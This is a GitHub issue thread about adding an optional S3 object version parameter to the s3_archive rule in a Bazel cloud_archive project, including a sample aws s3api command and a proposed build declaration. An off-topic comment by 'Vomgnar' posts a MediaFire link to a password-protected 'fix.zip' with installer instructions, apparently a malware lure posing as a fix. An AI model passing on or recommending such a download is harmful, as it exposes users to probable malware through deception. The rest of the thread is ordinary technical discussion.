### ISSUE TITLE
Versioning for object items

### ISSUE THREAD

**Issue by Ryang20718** [1e100/cloud_archive#3]
Hi @1e100

Thanks for this bazel rule! I Really appreciate it.

We have a couple of use cases where we'd like to fetch versions of an object from s3 which would mean using something of the sort. This means that we'll need to use the `s3api` subcommand rather than `s3`

```
aws s3api get-object --bucket <bucket> --key <key> --version-id <optional version>
```

Before I make any changes, wondering if you'd be receptive to me adding an optional version to either the `s3_archive` rule or perhaps creating a new rule named `s3_archive_version`?

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by 1e100** [comment]
@Ryang20718 thanks, and you're welcome. Could you show what that'd look like in the build file? I'm generally receptive of the idea, just wanted to visualize before you proceed. A single declaration would be fine, it doesn't even have to point to anything real

**Comment by Ryang20718** [comment]
```
    s3_archive(
        name = "<name>",
        bucket = "<bucket>",
        build_file_contents = <blah>,
        file_path = "<path to file>",
        sha256 = "<sha256>",
        version = "<version>",
    )
```
I don't use gcp, but I believe gsutil object storage also is able to specify versions of their artifacts.

The primary reason we'd want a version is because users may use the same s3 bucket and overwrite an artifact.

E.g person A and person B both have code that leverages s3 archive named `foo`.

if person A updates the object in the s3 bucket, it will break person's B code since s3 archive now points at the new object. with this versioning enabled, we could update the object, but not break person B's code

**Comment by 1e100** [comment]
SGTM, let's do it
